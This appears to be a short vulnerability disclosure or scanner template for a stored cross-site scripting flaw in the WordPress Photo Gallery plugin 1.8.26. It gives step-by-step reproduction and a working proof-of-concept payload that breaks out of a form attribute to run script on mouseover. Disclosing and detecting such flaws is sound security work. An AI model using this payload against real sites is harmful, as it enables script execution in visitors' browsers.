info: name:WordPressPhotoGalleryPluginStoredXSS author:0xr2r severity:high description:| Detects stored XSS vulnerability in WordPress Photo Gallery plugin version 1.8.26. The payload is injected in the "Distance between pictures" field and executes when the page is loaded. tags:wordpress,xss,stored,plugin reference: -https://10web.io/plugins/wordpress-photo-gallery/
1. Click Photo Gallery > Themes > Edit Themes > https://127.0.0.1/wp-admin/admin.php?page=themes_bwg&task=edit¤t_id=2 2. Write Distance between pictures place your payload**: `"onmouseover="alert(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"qq9r3` 3. Click Update 4. You will see the payload executed